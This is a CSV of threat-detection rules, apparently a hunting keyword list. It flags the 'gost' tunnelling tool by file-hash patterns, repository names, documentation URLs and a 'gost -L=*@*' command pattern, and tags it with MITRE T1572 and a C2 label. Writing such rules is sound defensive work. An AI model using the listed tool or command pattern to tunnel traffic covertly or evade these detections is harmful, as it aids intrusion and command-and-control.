"*ce360e6f1b4a634b603f8ac114e938c057bb1cda5141a053d83e16bcfe08e373*",".{0,1000}ce360e6f1b4a634b603f8ac114e938c057bb1cda5141a053d83e16bcfe08e373.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*ce3d52dbf87883133296d17bf791fa8a248d7613015bfcae22ae29e0fd0c6ed3*",".{0,1000}ce3d52dbf87883133296d17bf791fa8a248d7613015bfcae22ae29e0fd0c6ed3.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*ce523561aafdc54a24581460262853a579dfeda9653fb88bec95e3752a370118*",".{0,1000}ce523561aafdc54a24581460262853a579dfeda9653fb88bec95e3752a370118.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*d08e1e80fa721e95a7e71a7fed9e2ce0b726207f1e3ee96d809a6f0b34de4c05*",".{0,1000}d08e1e80fa721e95a7e71a7fed9e2ce0b726207f1e3ee96d809a6f0b34de4c05.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*d12a87b47c9213d80b8dfe9626702c953ebbfa92320b01f5f8b42a520a232537*",".{0,1000}d12a87b47c9213d80b8dfe9626702c953ebbfa92320b01f5f8b42a520a232537.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*d38000d3b741f587f2ddaadafcec1b1764a44989115d2c674895366692b0d545*",".{0,1000}d38000d3b741f587f2ddaadafcec1b1764a44989115d2c674895366692b0d545.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*d4ad1e550ef4d054f3c44601772f9df630323da7b8d28303c649d36659c63e76*",".{0,1000}d4ad1e550ef4d054f3c44601772f9df630323da7b8d28303c649d36659c63e76.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*d5257c716525f4cc42778285074e6425b22a272333d08cc75fa27334025b4c90*",".{0,1000}d5257c716525f4cc42778285074e6425b22a272333d08cc75fa27334025b4c90.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*d6debc94457abfce0e9fb02187fab3555dcef123591e4b167743d6322f02594a*",".{0,1000}d6debc94457abfce0e9fb02187fab3555dcef123591e4b167743d6322f02594a.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*d83b468e63c93a1496d8205ae9ac103540e23f1bb9410fca97020ab661552e11*",".{0,1000}d83b468e63c93a1496d8205ae9ac103540e23f1bb9410fca97020ab661552e11.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*d84969f4cdb8cb0518ecff3a0e9b8de406586afbd3ed9d7307691b375d2eb70b*",".{0,1000}d84969f4cdb8cb0518ecff3a0e9b8de406586afbd3ed9d7307691b375d2eb70b.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*d86c3884cb7ea73c0fd5e67c49e5375cd30fa5209a46f1bb620c1a8f52964488*",".{0,1000}d86c3884cb7ea73c0fd5e67c49e5375cd30fa5209a46f1bb620c1a8f52964488.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*d8cade3974728b8a3221c96a2b4c6beca41f13a2092cfd65deea83be6c78c6a0*",".{0,1000}d8cade3974728b8a3221c96a2b4c6beca41f13a2092cfd65deea83be6c78c6a0.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*d9bc47b827286a20cdd880d7d1abb2ac7b0bf164bfeab44fcfbbd1fb29f815bf*",".{0,1000}d9bc47b827286a20cdd880d7d1abb2ac7b0bf164bfeab44fcfbbd1fb29f815bf.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*dccda6bc37067f48e8efcfdeb8bb67b3a4475ef693bc10228bcba271a24ce5de*",".{0,1000}dccda6bc37067f48e8efcfdeb8bb67b3a4475ef693bc10228bcba271a24ce5de.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*dd1de5874d1287a59c05bcc7c8c298c9efaaf7b3471bc6baf9f3ed645951313d*",".{0,1000}dd1de5874d1287a59c05bcc7c8c298c9efaaf7b3471bc6baf9f3ed645951313d.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*dd3e4227210af530698b5669fda6ca0e604cf23aeeb5693f9f700aa9bce6256d*",".{0,1000}dd3e4227210af530698b5669fda6ca0e604cf23aeeb5693f9f700aa9bce6256d.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*de00ce580104a4afe01a1294a554d922103cf5a048708d022b3c231c5d841779*",".{0,1000}de00ce580104a4afe01a1294a554d922103cf5a048708d022b3c231c5d841779.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*e00d839edac7e43f8756ac53d803ea51ca8fdf7b58a888f021d2964ecc3c4351*",".{0,1000}e00d839edac7e43f8756ac53d803ea51ca8fdf7b58a888f021d2964ecc3c4351.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*e0955f1c4b9c89c926928109a080924c6400136bc2bce8d673ebf42c1d54d510*",".{0,1000}e0955f1c4b9c89c926928109a080924c6400136bc2bce8d673ebf42c1d54d510.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*e0d8fbe3a59bbf36170e5307ef979b4035784e35c0675ecc9309d35b7000a78e*",".{0,1000}e0d8fbe3a59bbf36170e5307ef979b4035784e35c0675ecc9309d35b7000a78e.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*e2d664ab3604b082e17dbd728c89bfdb82b5616f92defbe0cec24d94674c5818*",".{0,1000}e2d664ab3604b082e17dbd728c89bfdb82b5616f92defbe0cec24d94674c5818.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*e34406bea3c780144b827a7308a0468c53f773e4da11fb02ebfc91f76ecc754c*",".{0,1000}e34406bea3c780144b827a7308a0468c53f773e4da11fb02ebfc91f76ecc754c.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*e40c9f18d7f47c131876d6ef9a29385802e0d006e75ead9906a980c751fbee16*",".{0,1000}e40c9f18d7f47c131876d6ef9a29385802e0d006e75ead9906a980c751fbee16.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*e5350eb7c85f40bd5eeb5df8b3cd58805d39b2469a1c1c9817957fbab77e9427*",".{0,1000}e5350eb7c85f40bd5eeb5df8b3cd58805d39b2469a1c1c9817957fbab77e9427.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*e59ee7929f1c67c3aae6aa1f31299e0403430e7f25aecbcc572e19db79451d96*",".{0,1000}e59ee7929f1c67c3aae6aa1f31299e0403430e7f25aecbcc572e19db79451d96.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*e671c90f050cc03b06a1c976db31a1f2f1a498730c63bb2a29d92c9e47af5f66*",".{0,1000}e671c90f050cc03b06a1c976db31a1f2f1a498730c63bb2a29d92c9e47af5f66.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*e7e999c455e3e34a8ae2238395af8d0b50dda79499bca470547ffba7ff0c4b39*",".{0,1000}e7e999c455e3e34a8ae2238395af8d0b50dda79499bca470547ffba7ff0c4b39.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*e7ff1472a7294417e4f1dcd1c882de9f81f214b3f68f34ef4b8adca5af593c6c*",".{0,1000}e7ff1472a7294417e4f1dcd1c882de9f81f214b3f68f34ef4b8adca5af593c6c.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*e8b4edf6ac96c960c5462302cbd33c5d4673f2c1f88b6166b79e4766508c658b*",".{0,1000}e8b4edf6ac96c960c5462302cbd33c5d4673f2c1f88b6166b79e4766508c658b.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*e8e3e2c16aee37f48167a81cf38e071e7d0fcfceb2a060c3357f9cbb55fe78b6*",".{0,1000}e8e3e2c16aee37f48167a81cf38e071e7d0fcfceb2a060c3357f9cbb55fe78b6.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*e9ff51cca46583fe8f3ec4077fd863edb916e4d170d491100e4e35d8fa782a14*",".{0,1000}e9ff51cca46583fe8f3ec4077fd863edb916e4d170d491100e4e35d8fa782a14.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*ea92bdc7ebb7f0337690db66b44020aca6e1fccc36398b165847848a9f91c6c8*",".{0,1000}ea92bdc7ebb7f0337690db66b44020aca6e1fccc36398b165847848a9f91c6c8.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*eb74e547aada07218492e1fd08cc0048ff2ab30cc4d5a947122ca6385435f54a*",".{0,1000}eb74e547aada07218492e1fd08cc0048ff2ab30cc4d5a947122ca6385435f54a.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*eb8e44c7b95215c53b1bc78a95fa58fc7e8a47eb5d7c2538a5ac7a285857d79b*",".{0,1000}eb8e44c7b95215c53b1bc78a95fa58fc7e8a47eb5d7c2538a5ac7a285857d79b.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*ecf0123e2c1131eab2d4deb4ce43f9ffd7be2bf379fef19ed7730ee2ebb586be*",".{0,1000}ecf0123e2c1131eab2d4deb4ce43f9ffd7be2bf379fef19ed7730ee2ebb586be.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*ed19d0c0a65e0eaf321f86f95c1026fbae834876a8431d65609937e56e240ef8*",".{0,1000}ed19d0c0a65e0eaf321f86f95c1026fbae834876a8431d65609937e56e240ef8.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*eed97f810223bcf85f69b84040fd3e44e4a4569b4fab06da412c93fed71aef02*",".{0,1000}eed97f810223bcf85f69b84040fd3e44e4a4569b4fab06da412c93fed71aef02.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*ef1d847561dc29afa96b2e827e7c9a94facb9b6aae2b09ddb33c3c50ab581ae2*",".{0,1000}ef1d847561dc29afa96b2e827e7c9a94facb9b6aae2b09ddb33c3c50ab581ae2.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*ef37c5075ad3ac56cc95adace9e3686da6448cfcbe8430e997affb263e1cbdd9*",".{0,1000}ef37c5075ad3ac56cc95adace9e3686da6448cfcbe8430e997affb263e1cbdd9.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*f0d19d73955298f2766e55ff49347e31b2482a3bcba107ccbe38630b1aac355a*",".{0,1000}f0d19d73955298f2766e55ff49347e31b2482a3bcba107ccbe38630b1aac355a.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*f175e055b67f3cbaf4588a9decdb4ed6bf441ea28da502451ddd3da8ca87d390*",".{0,1000}f175e055b67f3cbaf4588a9decdb4ed6bf441ea28da502451ddd3da8ca87d390.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*f2f4b7576e0e51425fa90f94f272d0163571f90a0ecb8549f8b97dbf89c5255f*",".{0,1000}f2f4b7576e0e51425fa90f94f272d0163571f90a0ecb8549f8b97dbf89c5255f.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*f53753cf2f3d9f2200ae3b959299cbe1153851c534ce19f54daf281fc9238f69*",".{0,1000}f53753cf2f3d9f2200ae3b959299cbe1153851c534ce19f54daf281fc9238f69.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*f669e3b5a2053c74212d0c6f932651dd02fb5c4f5483061999855180b8257fa8*",".{0,1000}f669e3b5a2053c74212d0c6f932651dd02fb5c4f5483061999855180b8257fa8.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*f6d9c3345d2a1b88d31fd25eeedcf6947ac3e1ca5a693439894ef3c2bb2669f2*",".{0,1000}f6d9c3345d2a1b88d31fd25eeedcf6947ac3e1ca5a693439894ef3c2bb2669f2.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*f7f52607771ce2dddde694ebeced6e2dc438a29c8b87cfb93f125db4e968107c*",".{0,1000}f7f52607771ce2dddde694ebeced6e2dc438a29c8b87cfb93f125db4e968107c.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*f891dc701c6d272cbc51bc2975a80e42f80d814f23cda2e9d9c1c005ec216529*",".{0,1000}f891dc701c6d272cbc51bc2975a80e42f80d814f23cda2e9d9c1c005ec216529.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*fb540480308fe9d575f799632c7a655ac05f19d6cdb58f5e6ff62a11c7f2ef84*",".{0,1000}fb540480308fe9d575f799632c7a655ac05f19d6cdb58f5e6ff62a11c7f2ef84.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*fc258ceabaf70cc28b8519a46a8045cac406d275707942f88e952621c6c382ec*",".{0,1000}fc258ceabaf70cc28b8519a46a8045cac406d275707942f88e952621c6c382ec.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*fc5f6cc320156278ec6b2f26d97fb4d56a429cb4365b893ce0c9c602ade37b9a*",".{0,1000}fc5f6cc320156278ec6b2f26d97fb4d56a429cb4365b893ce0c9c602ade37b9a.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*fc6b300edf4c44463e17b8ea10303ee642e4114235fdb0096384f8f3b5f44ce6*",".{0,1000}fc6b300edf4c44463e17b8ea10303ee642e4114235fdb0096384f8f3b5f44ce6.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*fc97d73cd3ae1d0e0cc492a7b67ef928a59296fd2bebb99e753672b964813895*",".{0,1000}fc97d73cd3ae1d0e0cc492a7b67ef928a59296fd2bebb99e753672b964813895.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*fce455e607e33bce8fc0f29bb1bbf34e7a886c39bb48995ee3af25a91f2a57f9*",".{0,1000}fce455e607e33bce8fc0f29bb1bbf34e7a886c39bb48995ee3af25a91f2a57f9.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*fdeb3ef3bb907499be9d8fda107426d15ea9535e0f7818a206ded082f31fcbbf*",".{0,1000}fdeb3ef3bb907499be9d8fda107426d15ea9535e0f7818a206ded082f31fcbbf.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*fe7fb6e885955c83dfa6c9797f277b30971ec4f0261cec7ebbb864408fa02aaa*",".{0,1000}fe7fb6e885955c83dfa6c9797f277b30971ec4f0261cec7ebbb864408fa02aaa.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*ff00ffad183c58baa5252cbdd086257a9ae7b4539a02950eeb3347049e606c5a*",".{0,1000}ff00ffad183c58baa5252cbdd086257a9ae7b4539a02950eeb3347049e606c5a.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*ff4dc01b1bd4ab8682316280bd90cbc15f8cf14eca91e6a5180129b1fd39f2df*",".{0,1000}ff4dc01b1bd4ab8682316280bd90cbc15f8cf14eca91e6a5180129b1fd39f2df.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*ff5892909fbe28600444bce96bb710aa2d1eaeb69231997ebfa76d40d87fe3ea*",".{0,1000}ff5892909fbe28600444bce96bb710aa2d1eaeb69231997ebfa76d40d87fe3ea.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*ff63fca9ccb4a827d0b62fc9bdcce683ef8ede7b11f2a0054393e0d061d8d241*",".{0,1000}ff63fca9ccb4a827d0b62fc9bdcce683ef8ede7b11f2a0054393e0d061d8d241.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*gogost/gost*",".{0,1000}gogost\/gost.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","N/A","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*go-gost/gost*",".{0,1000}go\-gost\/gost.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","1","N/A","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*gost -L=*@*",".{0,1000}gost\s\-L\=.{0,1000}\@.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","N/A","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*https://gost.run/tutorials/*",".{0,1000}https\:\/\/gost\.run\/tutorials\/.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","1","N/A","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*https://gost.run/tutorials/api/config*",".{0,1000}https\:\/\/gost\.run\/tutorials\/api\/config.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","1","N/A","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
